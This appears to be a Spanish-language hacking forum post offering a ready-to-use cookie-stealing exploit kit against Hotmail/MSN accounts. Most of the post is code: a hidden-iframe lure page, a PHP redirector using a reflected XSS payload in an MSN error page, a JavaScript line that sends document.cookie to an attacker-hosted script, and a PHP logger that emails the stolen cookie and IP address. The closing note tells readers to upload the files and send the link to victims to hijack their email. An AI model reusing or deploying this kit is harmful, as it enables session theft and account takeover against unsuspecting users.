Bueno estoy seguro de que este post será muy visitado jeje, como bien dice el título actualmente existe un gran bug en hotmail, tan grave que con solo pinchar en un enlace tu correo puede ser robado, este bug guarda las cookies de aquel que pinche en un enlace, de forma que son enviadas al correo que eligas(el tuyo vamos) y apartir de ahí facilmente puedes entrar al correo. Por favor si lo copiais no os olvideis la fuente, este bug era privado pero al parecer por un descuido salio a la luz.
Autor: _Antrax_
Web: www.c-group.org
Ya esta aceptado por Milw0rm aunque creo que aun no lo publicaron.
Exploit php
Index.php
Código:
ind.php<html>
<body>
<IFRAME SRC="http://www.xxxx.com/ind.php" WIDTH=10 HEIGHT=10>
<A HREF="ind.php">link</A>
</IFRAME>
</body></html>
Código:
<?
$mysite = "http://www.xxxx.com/nice.js"; # <== Edit
$xpl = "http://moviles.es.msn.com/error.php?error=11&returnurl=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/nice.js%3E%3C/script%3E";
print '
<title>ASD</title>
<body bgcolor="ffffff">
<center>
<b></b><br>
<img src="asd.gif"></center>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL='.$xpl.'">
';
?>
log.php
Código:
<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");
$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("[email protected]", $subject, $msg);
header ("location: asd.gif");
?>
nice.js
Código:
By Dario Struzlocation.href='http://www.xxxx.com/log.php?nice='+escape(document.cookie)
reemplazar xxx.com por el sitio donde uno alojo los php ...
Greetz www.c-group.org Fr34k , penissmen , 4ur3v0ir , S4nt0!, DevilInsideTk , Putus , Inyexion , Bacan , Hanowars ,Chapinhack and Friends.
PD: Ahí teneís el codigo, simplemente armarlo con vuestros datos, subirlo a un ftp y enviar el enlace a alguien y recibireis es vuestro correo sus cookies.
Saludos An3urysm_
Marcadores